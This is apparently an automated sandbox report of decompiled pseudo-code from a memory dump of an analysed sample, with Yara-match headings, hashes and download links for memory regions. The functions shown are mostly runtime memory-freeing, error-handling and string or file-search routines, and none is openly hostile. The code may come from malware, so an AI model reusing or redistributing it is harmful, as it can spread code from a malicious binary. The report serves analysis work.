                    						_t22 = _v12 + 4; // 0xf0014387
                    						 *_t78 = E01406C42( *((intOrPtr*)( *_t22)));
                    						_t33 = E013F786E(_t56);
                    						_t57 = _v12;
                    						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
                    						_t24 = _t78 + 4; // 0xb0184c
                    						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E013F786E(_t24);
                    						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E013F786E(_t83);
                    						_t37 = 0;
                    						L15:
                    						return _t37;
                    					}
                    					_t38 = 0x200;
                    					_t85 = _t83 - _t56 >> 2;
                    					if(_t85 <= 0x200) {
                    						_t38 = _t85;
                    					}
                    					_t80 = _t38 + _t85;
                    					if(_t80 == 0) {
                    						_t80 = 0x20;
                    					}
                    					if(_t80 < _t85) {
                    						L9:
                    						_push(4);
                    						_t7 = _t85 + 4; // 0x80000007
                    						_t80 = _t7;
                    						_push(_t80);
                    						_v8 = E0140D7AC(_t56);
                    						_t40 = E014012E1(0);
                    						_t68 = _v8;
                    						_t86 = _t86 + 0x10;
                    						if(_t68 != 0) {
                    							goto L11;
                    						}
                    						_t37 = _t40 | 0xffffffff;
                    						goto L15;
                    					} else {
                    						_push(4);
                    						_push(_t80);
                    						_v8 = E0140D7AC(_t56);
                    						E014012E1(0);
                    						_t68 = _v8;
                    						_t86 = _t86 + 0x10;
                    						if(_t68 != 0) {
                    							L11:
                    							_t56 = _t68;
                    							_v8 = _t68 + _t85 * 4;
                    							_t83 = _t68 + _t80 * 4;
                    							_t78 = _v8;
                    							_push(0x20);
                    							asm("ror eax, cl");
                    							_t71 = _t78;
                    							_v16 = 0 ^  *0x1435234;
                    							asm("sbb edx, edx");
                    							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
                    							_v8 = _t74;
                    							if(_t74 == 0) {
                    								goto L14;
                    							}
                    							_t75 = _v16;
                    							_t50 = 0;
                    							do {
                    								_t50 = _t50 + 1;
                    								 *_t71 = _t75;
                    								_t71 = _t71 + 4;
                    							} while (_t50 != _v8);
                    							goto L14;
                    						}
                    						goto L9;
                    					}
                    				}
                    				return _t28 | 0xffffffff;
                    			}

























                    0x01403ddf
                    0x01403de9
                    0x01403ded
                    0x01403def
                    0x01403df3
                    0x01403dfd
                    0x01403e0b
                    0x01403e0e
                    0x01403e10
                    0x01403e13
                    0x01403e15
                    0x01403e17
                    0x01403e19
                    0x01403e1b
                    0x01403e1f
                    0x01403ed9
                    0x01403edc
                    0x01403ee7
                    0x01403ee9
                    0x01403eee
                    0x01403ef5
                    0x01403ef7
                    0x01403f05
                    0x01403f14
                    0x01403f17
                    0x01403f19
                    0x00000000
                    0x01403f1a
                    0x01403e27
                    0x01403e2c
                    0x01403e31
                    0x01403e33
                    0x01403e33
                    0x01403e35
                    0x01403e3a
                    0x01403e3e
                    0x01403e3e
                    0x01403e41
                    0x01403e60
                    0x01403e60
                    0x01403e62
                    0x01403e62
                    0x01403e65
                    0x01403e6e
                    0x01403e71
                    0x01403e76
                    0x01403e79
                    0x01403e7e
                    0x00000000
                    0x00000000
                    0x01403e80
                    0x00000000
                    0x01403e43
                    0x01403e43
                    0x01403e45
                    0x01403e4e
                    0x01403e51
                    0x01403e56
                    0x01403e59
                    0x01403e5e
                    0x01403e88
                    0x01403e8b
                    0x01403e8d
                    0x01403e90
                    0x01403e98
                    0x01403e9e
                    0x01403ea5
                    0x01403ea7
                    0x01403eaf
                    0x01403ebe
                    0x01403ec2
                    0x01403ec4
                    0x01403ec7
                    0x00000000
                    0x00000000
                    0x01403ec9
                    0x01403ecc
                    0x01403ece
                    0x01403ece
                    0x01403ecf
                    0x01403ed1
                    0x01403ed4
                    0x00000000
                    0x01403ece
                    0x00000000
                    0x01403e5e
                    0x01403e41
                    0x00000000

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: 8b80e98ec373d987bd24cd77b96dc7228f9542e46a2fdf8c591c1c1a469197ef
                    • Instruction ID: 057b70fee85f3fc1c393614e11ef44d85a0793d3d90d049fc5606bcc0d58feef
                    • Opcode Fuzzy Hash: 8b80e98ec373d987bd24cd77b96dc7228f9542e46a2fdf8c591c1c1a469197ef
                    • Instruction Fuzzy Hash: 85419436A002049FCB25DF6AC880A5EBBA5FF84724F15456EE515EB391D731AD01CB80
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 81%
                    			E01406A85(void* __ecx) {
                    				intOrPtr _t2;
                    				void* _t4;
                    				void* _t10;
                    				void* _t11;
                    				void* _t13;
                    				void* _t15;
                    				long _t16;
                    
                    				_t11 = __ecx;
                    				_t16 = GetLastError();
                    				_t10 = 0;
                    				_t2 =  *0x14353a4; // 0x6
                    				_t19 = _t2 - 0xffffffff;
                    				if(_t2 == 0xffffffff) {
                    					L2:
                    					_t15 = E014009B2(_t11, 1, 0x364);
                    					_pop(_t13);
                    					if(_t15 != 0) {
                    						_t4 = E01406F75(_t13, __eflags,  *0x14353a4, _t15);
                    						__eflags = _t4;
                    						if(_t4 != 0) {
                    							E01406873(_t13, _t15, 0x143a950);
                    							E014012E1(_t10);
                    							__eflags = _t15;
                    							if(_t15 != 0) {
                    								goto L9;
                    							} else {
                    								goto L8;
                    							}
                    						} else {
                    							_push(_t15);
                    							goto L4;
                    						}
                    					} else {
                    						_push(_t10);
                    						L4:
                    						E014012E1();
                    						L8:
                    						SetLastError(_t16);
                    					}
                    				} else {
                    					_t15 = E01406F1F(_t11, _t19, _t2);
                    					if(_t15 != 0) {
                    						L9:
                    						SetLastError(_t16);
                    						_t10 = _t15;
                    					} else {
                    						goto L2;
                    					}
                    				}
                    				return _t10;
                    			}










                    0x01406a85
                    0x01406a90
                    0x01406a92
                    0x01406a94
                    0x01406a99
                    0x01406a9c
                    0x01406aaa
                    0x01406ab6
                    0x01406ab9
                    0x01406abc
                    0x01406ace
                    0x01406ad3
                    0x01406ad5
                    0x01406ae0
                    0x01406ae6
                    0x01406aee
                    0x01406af0
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01406ad7
                    0x01406ad7
                    0x00000000
                    0x01406ad7
                    0x01406abe
                    0x01406abe
                    0x01406abf
                    0x01406abf
                    0x01406af2
                    0x01406af3
                    0x01406af3
                    0x01406a9e
                    0x01406aa4
                    0x01406aa8
                    0x01406afb
                    0x01406afc
                    0x01406b02
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01406aa8
                    0x01406b09

                    APIs
                    • GetLastError.KERNEL32(?,?,?,013FDB3F,013FF169,?,?,013C957D,?,00000400), ref: 01406A8A
                    • _free.LIBCMT ref: 01406ABF
                    • _free.LIBCMT ref: 01406AE6
                    • SetLastError.KERNEL32(00000000), ref: 01406AF3
                    • SetLastError.KERNEL32(00000000), ref: 01406AFC
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$_free
                    • String ID:
                    • API String ID: 3170660625-0
                    • Opcode ID: b3a2b6743ffa96a260a89e5b5001f0f9d01071cb842bc8d0d0c735bd71cbe00c
                    • Instruction ID: 6cf84e0fdabec70d4728680dd41fa36c6890c4c072a893fd603e6f37c827f7c6
                    • Opcode Fuzzy Hash: b3a2b6743ffa96a260a89e5b5001f0f9d01071cb842bc8d0d0c735bd71cbe00c
                    • Instruction Fuzzy Hash: DE01F9B22056022F9213B77B5C84D1B26699FE2670727403FF507E72F1EE74C8655921
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0140E2B4(intOrPtr* _a4) {
                    				intOrPtr _t6;
                    				intOrPtr* _t21;
                    				void* _t23;
                    				void* _t24;
                    				void* _t25;
                    				void* _t26;
                    				void* _t27;
                    
                    				_t21 = _a4;
                    				if(_t21 != 0) {
                    					_t23 =  *_t21 -  *0x1435348; // 0x1435340
                    					if(_t23 != 0) {
                    						E014012E1(_t7);
                    					}
                    					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x143534c; // 0x143a4f0
                    					if(_t24 != 0) {
                    						E014012E1(_t8);
                    					}
                    					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x1435350; // 0x143a4f0
                    					if(_t25 != 0) {
                    						E014012E1(_t9);
                    					}
                    					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x1435378; // 0x1435344
                    					if(_t26 != 0) {
                    						E014012E1(_t10);
                    					}
                    					_t6 =  *((intOrPtr*)(_t21 + 0x34));
                    					_t27 = _t6 -  *0x143537c; // 0x143a4f4
                    					if(_t27 != 0) {
                    						return E014012E1(_t6);
                    					}
                    				}
                    				return _t6;
                    			}










                    0x0140e2ba
                    0x0140e2bf
                    0x0140e2c3
                    0x0140e2c9
                    0x0140e2cc
                    0x0140e2d1
                    0x0140e2d5
                    0x0140e2db
                    0x0140e2de
                    0x0140e2e3
                    0x0140e2e7
                    0x0140e2ed
                    0x0140e2f0
                    0x0140e2f5
                    0x0140e2f9
                    0x0140e2ff
                    0x0140e302
                    0x0140e307
                    0x0140e308
                    0x0140e30b
                    0x0140e311
                    0x00000000
                    0x0140e319
                    0x0140e311
                    0x0140e31c

                    APIs
                    • _free.LIBCMT ref: 0140E2CC
                      • Part of subcall function 014012E1: HeapFree.KERNEL32(00000000,00000000,?,0140E567,?,00000000,?,00000000,?,0140E80B,?,00000007,?,?,0140EC39,?), ref: 014012F7
                      • Part of subcall function 014012E1: GetLastError.KERNEL32(?,?,0140E567,?,00000000,?,00000000,?,0140E80B,?,00000007,?,?,0140EC39,?,?), ref: 01401309
                    • _free.LIBCMT ref: 0140E2DE
                    • _free.LIBCMT ref: 0140E2F0
                    • _free.LIBCMT ref: 0140E302
                    • _free.LIBCMT ref: 0140E314
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: efacb57dd03c30e8e686aa47ac88e7131e6fccb087852938d3d97f8104be59c6
                    • Instruction ID: 7017226e54033c6996ab47628e901fee99dc2cc223c477ab55e3fb4db2a827dc
                    • Opcode Fuzzy Hash: efacb57dd03c30e8e686aa47ac88e7131e6fccb087852938d3d97f8104be59c6
                    • Instruction Fuzzy Hash: A0F0FF72504211AB9636EBABE4C5C5B7BD9AB10B107644C3FF144FB6A4CB70F8A14A58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E01404039(signed int __ecx) {
                    				intOrPtr _t7;
                    
                    				asm("lock xadd [eax], ecx");
                    				if((__ecx | 0xffffffff) == 0) {
                    					_t7 =  *0x1435a68; // 0xafcfd8
                    					if(_t7 != 0x1435848) {
                    						E014012E1(_t7);
                    						 *0x1435a68 = 0x1435848;
                    					}
                    				}
                    				E014012E1( *0x143a944);
                    				 *0x143a944 = 0;
                    				E014012E1( *0x143a948);
                    				 *0x143a948 = 0;
                    				E014012E1( *0x143a644);
                    				 *0x143a644 = 0;
                    				E014012E1( *0x143a648);
                    				 *0x143a648 = 0;
                    				return 1;
                    			}




                    0x01404042
                    0x01404046
                    0x01404048
                    0x01404054
                    0x01404057
                    0x0140405d
                    0x0140405d
                    0x01404054
                    0x01404069
                    0x01404076
                    0x0140407c
                    0x01404087
                    0x0140408d
                    0x01404098
                    0x0140409e
                    0x014040a6
                    0x014040af

                    APIs
                    • _free.LIBCMT ref: 01404057
                      • Part of subcall function 014012E1: HeapFree.KERNEL32(00000000,00000000,?,0140E567,?,00000000,?,00000000,?,0140E80B,?,00000007,?,?,0140EC39,?), ref: 014012F7
                      • Part of subcall function 014012E1: GetLastError.KERNEL32(?,?,0140E567,?,00000000,?,00000000,?,0140E80B,?,00000007,?,?,0140EC39,?,?), ref: 01401309
                    • _free.LIBCMT ref: 01404069
                    • _free.LIBCMT ref: 0140407C
                    • _free.LIBCMT ref: 0140408D
                    • _free.LIBCMT ref: 0140409E
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: bed084806e6eb2e89ea078d421fe3c959ffc532e1ecfeaaa49f4cf49b2eac3c5
                    • Instruction ID: ef7bb992f15ca711078fd19565056b864e1b5f0ae1f2154bd9fe8bfef59a6015
                    • Opcode Fuzzy Hash: bed084806e6eb2e89ea078d421fe3c959ffc532e1ecfeaaa49f4cf49b2eac3c5
                    • Instruction Fuzzy Hash: D0F0D0F48413119B9A32AF56B4C14153BA4ABB4B20335056FF494F72B8C7354551EBC4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 81%
                    			E013E8350(intOrPtr* __ecx, intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20) {
                    				intOrPtr* _v4;
                    				void* __ebx;
                    				void* __edi;
                    				void* __ebp;
                    				signed int _t45;
                    				signed int _t46;
                    				signed int _t48;
                    				void* _t50;
                    				signed int _t54;
                    				signed int _t55;
                    				void* _t60;
                    				signed int _t61;
                    				void* _t62;
                    				signed int _t63;
                    				void* _t64;
                    				signed int _t69;
                    				char* _t71;
                    				intOrPtr* _t75;
                    				signed int _t77;
                    				signed int _t78;
                    				intOrPtr _t84;
                    				intOrPtr _t85;
                    				signed int _t87;
                    				intOrPtr _t88;
                    				intOrPtr _t90;
                    				intOrPtr _t92;
                    				intOrPtr* _t93;
                    				intOrPtr* _t94;
                    				void* _t95;
                    				void* _t96;
                    				void* _t99;
                    				void* _t100;
                    
                    				_t94 = _a16;
                    				_t93 = __ecx;
                    				_t71 = "ValueNames";
                    				_t87 = _a8;
                    				 *__ecx = _a4;
                    				 *((intOrPtr*)(__ecx + 8)) = _a12;
                    				_t45 = _t87;
                    				 *(__ecx + 4) = _t87;
                    				 *((intOrPtr*)(__ecx + 0xc)) = _t94;
                    				 *((short*)(__ecx + 0x10)) = 0;
                    				while(1) {
                    					_t84 =  *_t45;
                    					if(_t84 !=  *_t71) {
                    						break;
                    					}
                    					if(_t84 == 0) {
                    						L5:
                    						_t46 = 0;
                    					} else {
                    						_t84 =  *((intOrPtr*)(_t45 + 1));
                    						if(_t84 != _t71[1]) {
                    							break;
                    						} else {
                    							_t45 = _t45 + 2;
                    							_t71 =  &(_t71[2]);
                    							if(_t84 != 0) {
                    								continue;
                    							} else {
                    								goto L5;
                    							}
                    						}
                    					}
                    					L7:
                    					_t69 = _a20;
                    					_t105 = _t46;
                    					if(_t46 == 0) {
                    						_push(_a12);
                    						 *((short*)(_t93 + 0x10)) = 0x101;
                    						_push(0x14383f8);
                    						_push(_t87);
                    						E013C56E5(_t69, _t84, _t105);
                    						_t92 = _a12;
                    						_t99 = _t96 + 0xc;
                    						if(_t69 != 0) {
                    							 *((intOrPtr*)( *_t69 + 4))( *((intOrPtr*)(_t93 + 4)), _t92, _t94);
                    						}
                    						_t60 = E013F4DBF(0x1437448, 0x1437448);
                    						_t100 = _t99 + 8;
                    						_t107 = _t60;
                    						if(_t60 != 0) {
                    							E013E88C0(_t69, _a4 + 0x3c, _t94,  *((intOrPtr*)(_t93 + 4)), _t92, _t94);
                    						}
                    						_t61 = E013F4DFB(_t92, 0x1437448, 0x1439f60);
                    						_t96 = _t100 + 8;
                    						_t87 = _t61;
                    						_push(0xc);
                    						_t62 = E013C6330(_t69,  *((intOrPtr*)(_t93 + 0xc)), _t107, "ThisPointer:");
                    						_t108 =  *_t87;
                    						_t95 = _t62;
                    						if( *_t87 != 0) {
                    							_t77 = _t87;
                    							_t21 = _t77 + 1; // 0x1
                    							_t84 = _t21;
                    							do {
                    								_t63 =  *_t77;
                    								_t77 = _t77 + 1;
                    								__eflags = _t63;
                    							} while (_t63 != 0);
                    							_t78 = _t77 - _t84;
                    							__eflags = _t78;
                    						} else {
                    							_t78 = 0;
                    						}
                    						_push(_t78);
                    						_t64 = E013C6330(_t69, _t95, _t108, _t87);
                    						_push(0x3b);
                    						E013C6296(_t69, _t64, _t84, _t87, 1);
                    						_t94 = _v4;
                    					}
                    					if( *((char*)(_t93 + 0x10)) != 0) {
                    						L32:
                    						_t88 = _a12;
                    						goto L33;
                    					} else {
                    						_t50 = E013FF910( *((intOrPtr*)(_t93 + 4)), "ThisPointer:", 0xc);
                    						_t96 = _t96 + 0xc;
                    						if(_t50 != 0) {
                    							L29:
                    							__eflags =  *((char*)(_t93 + 0x10));
                    							if( *((char*)(_t93 + 0x10)) != 0) {
                    								goto L32;
                    							} else {
                    								_t88 = _a12;
                    								__eflags = _t69;
                    								if(_t69 != 0) {
                    									 *((char*)(_t93 + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)( *_t69 + 4))))( *((intOrPtr*)(_t93 + 4)), _t88, _t94);
                    								}
                    							}
                    							L33:
                    							__eflags =  *((char*)(_t93 + 0x10));
                    							if( *((char*)(_t93 + 0x10)) == 0) {
                    								_t48 = E013F4DBF(0x1437448, 0x1437448);
                    								__eflags = _t48;
                    								if(_t48 != 0) {
                    									 *((char*)(_t93 + 0x10)) = E013E88C0(_t69, _a4 + 0x3c, _t94,  *((intOrPtr*)(_t93 + 4)), _t88, _t94);
                    								}
                    							}
                    							return _t93;
                    						} else {
                    							_t54 = E013F4DFB(_t87, 0x1437448, 0x1439f60);
                    							_t90 =  *((intOrPtr*)(_t93 + 4));
                    							_t96 = _t96 + 8;
                    							_t75 = _t90 + 0xc;
                    							while(1) {
                    								_t85 =  *_t75;
                    								if(_t85 !=  *_t54) {
                    									break;
                    								}
                    								if(_t85 == 0) {
                    									L25:
                    									_t55 = 0;
                    								} else {
                    									_t85 =  *((intOrPtr*)(_t75 + 1));
                    									if(_t85 !=  *((intOrPtr*)(_t54 + 1))) {
                    										break;
                    									} else {
                    										_t75 = _t75 + 2;
                    										_t54 = _t54 + 2;
                    										if(_t85 != 0) {
                    											continue;
                    										} else {
                    											goto L25;
                    										}
                    									}
                    								}
                    								L27:
                    								_t115 = _t55;
                    								if(_t55 != 0) {
                    									goto L29;
                    								} else {
                    									_push( *((intOrPtr*)(_t93 + 8)));
                    									_push(0x14384e4);
                    									_push(_t90);
                    									E013C56E5(_t69, _t85, _t115);
                    									 *_t94 = _a4;
                    									 *((char*)(_t93 + 0x10)) = 1;
                    									return _t93;
                    								}
                    								goto L37;
                    							}
                    							asm("sbb eax, eax");
                    							_t55 = _t54 | 0x00000001;
                    							__eflags = _t55;
                    							goto L27;
                    						}
                    					}
                    					L37:
                    				}
                    				asm("sbb eax, eax");
                    				_t46 = _t45 | 0x00000001;
                    				__eflags = _t46;
                    				goto L7;
                    			}



































                    0x013e8356
                    0x013e835b
                    0x013e835d
                    0x013e8363
                    0x013e8367
                    0x013e836d
                    0x013e8370
                    0x013e8372
                    0x013e8375
                    0x013e8378
                    0x013e8380
                    0x013e8380
                    0x013e8384
                    0x00000000
                    0x00000000
                    0x013e8388
                    0x013e839c
                    0x013e839c
                    0x013e838a
                    0x013e838a
                    0x013e8390
                    0x00000000
                    0x013e8392
                    0x013e8392
                    0x013e8395
                    0x013e839a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x013e839a
                    0x013e8390
                    0x013e83a5
                    0x013e83a5
                    0x013e83a9
                    0x013e83ab
                    0x013e83b1
                    0x013e83b5
                    0x013e83bb
                    0x013e83c0
                    0x013e83c1
                    0x013e83c6
                    0x013e83ca
                    0x013e83cf
                    0x013e83da
                    0x013e83da
                    0x013e83e7
                    0x013e83ec
                    0x013e83ef
                    0x013e83f1
                    0x013e83ff
                    0x013e83ff
                    0x013e840e
                    0x013e8416
                    0x013e8419
                    0x013e841b
                    0x013e8422
                    0x013e8427
                    0x013e842a
                    0x013e842c
                    0x013e8432
                    0x013e8434
                    0x013e8434
                    0x013e8437
                    0x013e8437
                    0x013e8439
                    0x013e843a
                    0x013e843a
                    0x013e843e
                    0x013e843e
                    0x013e842e
                    0x013e842e
                    0x013e842e
                    0x013e8440
                    0x013e8444
                    0x013e8449
                    0x013e844f
                    0x013e8454
                    0x013e8454
                    0x013e845c
                    0x013e84ff
                    0x013e84ff
                    0x00000000
                    0x013e8462
                    0x013e846c
                    0x013e8471
                    0x013e8476
                    0x013e84de
                    0x013e84de
                    0x013e84e2
                    0x00000000
                    0x013e84e4
                    0x013e84e4
                    0x013e84e8
                    0x013e84ea
                    0x013e84fa
                    0x013e84fa
                    0x013e84ea
                    0x013e8503
                    0x013e8503
                    0x013e8507
                    0x013e8513
                    0x013e851b
                    0x013e851d
                    0x013e8530
                    0x013e8530
                    0x013e851d
                    0x013e8539
                    0x013e8478
                    0x013e8482
                    0x013e8487
                    0x013e848a
                    0x013e848d
                    0x013e8490
                    0x013e8490
                    0x013e8494
                    0x00000000
                    0x00000000
                    0x013e8498
                    0x013e84ac
                    0x013e84ac
                    0x013e849a
                    0x013e849a
                    0x013e84a0
                    0x00000000
                    0x013e84a2
                    0x013e84a2
                    0x013e84a5
                    0x013e84aa
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x013e84aa
                    0x013e84a0
                    0x013e84b5
                    0x013e84b5
                    0x013e84b7
                    0x00000000
                    0x013e84b9
                    0x013e84b9
                    0x013e84bc
                    0x013e84c1
                    0x013e84c2
                    0x013e84ce
                    0x013e84d3
                    0x013e84db
                    0x013e84db
                    0x00000000
                    0x013e84b7
                    0x013e84b0
                    0x013e84b2
                    0x013e84b2
                    0x00000000
                    0x013e84b2
                    0x013e8476
                    0x00000000
                    0x013e845c
                    0x013e83a0
                    0x013e83a2
                    0x013e83a2
                    0x00000000

                    APIs
                    • ___std_type_info_name.LIBVCRUNTIME ref: 013E840E
                    • ___std_type_info_name.LIBVCRUNTIME ref: 013E8482
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ___std_type_info_name
                    • String ID: ThisPointer:$ValueNames
                    • API String ID: 1734802720-2375088429
                    • Opcode ID: e0a951917b4708f90f9034cfd114888179fda84b0ae244cebe89ce53c40a978e
                    • Instruction ID: a88ecc4cf0b4ca5e63bc8c5a429ec4da94d80d3d73edcce3fef8c1b8ebe750ea
                    • Opcode Fuzzy Hash: e0a951917b4708f90f9034cfd114888179fda84b0ae244cebe89ce53c40a978e
                    • Instruction Fuzzy Hash: D7515531A043415FD7219F2CDC45B67BBEAEFA170CF1448ADE981972A2D772E809C761
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 74%
                    			E0140C786(signed int _a4, signed int _a8, intOrPtr _a12) {
                    				intOrPtr _v0;
                    				char _v6;
                    				char _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				signed int _v28;
                    				signed int _v36;
                    				intOrPtr* _v64;
                    				intOrPtr _v96;
                    				intOrPtr* _v100;
                    				CHAR* _v104;
                    				signed int _v116;
                    				char _v290;
                    				signed int _v291;
                    				struct _WIN32_FIND_DATAA _v336;
                    				union _FINDEX_INFO_LEVELS _v340;
                    				signed int _v344;
                    				signed int _v348;
                    				intOrPtr _v440;
                    				void* __edi;
                    				void* __ebp;
                    				intOrPtr* _t80;
                    				signed int _t82;
                    				signed int _t87;
                    				signed int _t91;
                    				signed int _t93;
                    				signed int _t95;
                    				signed int _t96;
                    				signed int _t100;
                    				signed int _t103;
                    				signed int _t108;
                    				signed int _t111;
                    				intOrPtr _t113;
                    				signed char _t115;
                    				union _FINDEX_INFO_LEVELS _t123;
                    				signed int _t128;
                    				signed int _t131;
                    				void* _t136;
                    				void* _t138;
                    				signed int _t139;
                    				signed int _t142;
                    				signed int _t144;
                    				signed int _t146;
                    				signed int* _t147;
                    				signed int _t150;
                    				void* _t153;
                    				CHAR* _t154;
                    				char _t157;
                    				char _t159;
                    				intOrPtr* _t162;
                    				void* _t163;
                    				intOrPtr* _t164;
                    				signed int _t166;
                    				void* _t168;
                    				intOrPtr* _t169;
                    				signed int _t173;
                    				signed int _t177;
                    				signed int _t178;
                    				intOrPtr* _t183;
                    				void* _t192;
                    				intOrPtr _t193;
                    				signed int _t195;
                    				signed int _t196;
                    				signed int _t198;
                    				signed int _t199;
                    				signed int _t201;
                    				union _FINDEX_INFO_LEVELS _t202;
                    				signed int _t207;
                    				signed int _t209;
                    				signed int _t210;
                    				void* _t212;
                    				intOrPtr _t213;
                    				void* _t214;
                    				signed int _t218;
                    				void* _t220;
                    				signed int _t221;
                    				void* _t222;
                    				void* _t223;
                    				void* _t224;
                    				signed int _t225;
                    				void* _t226;
                    				void* _t227;
                    
                    				_t80 = _a8;
                    				_t223 = _t222 - 0x20;
                    				if(_t80 != 0) {
                    					_t207 = _a4;
                    					_t159 = 0;
                    					 *_t80 = 0;
                    					_t198 = 0;
                    					_t150 = 0;
                    					_v36 = 0;
                    					_v336.cAlternateFileName = 0;
                    					_v28 = 0;
                    					__eflags =  *_t207;
                    					if( *_t207 == 0) {
                    						L9:
                    						_v12 = _v12 & 0x00000000;
                    						_t82 = _t150 - _t198;
                    						_v8 = _t159;
                    						_t190 = (_t82 >> 2) + 1;
                    						__eflags = _t150 - _t198;
                    						_v16 = (_t82 >> 2) + 1;
                    						asm("sbb esi, esi");
                    						_t209 =  !_t207 & _t82 + 0x00000003 >> 0x00000002;
                    						__eflags = _t209;
                    						if(_t209 != 0) {
                    							_t196 = _t198;
                    							_t157 = _t159;
                    							do {
                    								_t183 =  *_t196;
                    								_t17 = _t183 + 1; // 0x1
                    								_v8 = _t17;
                    								do {
                    									_t142 =  *_t183;
                    									_t183 = _t183 + 1;
                    									__eflags = _t142;
                    								} while (_t142 != 0);
                    								_t157 = _t157 + 1 + _t183 - _v8;
                    								_t196 = _t196 + 4;
                    								_t144 = _v12 + 1;
                    								_v12 = _t144;
                    								__eflags = _t144 - _t209;
                    							} while (_t144 != _t209);
                    							_t190 = _v16;
                    							_v8 = _t157;
                    							_t150 = _v336.cAlternateFileName;
                    						}
                    						_t210 = E0140389B(_t190, _v8, 1);
                    						_t224 = _t223 + 0xc;
                    						__eflags = _t210;
                    						if(_t210 != 0) {
                    							_t87 = _t210 + _v16 * 4;
                    							_v20 = _t87;
                    							_t191 = _t87;
                    							_v16 = _t87;
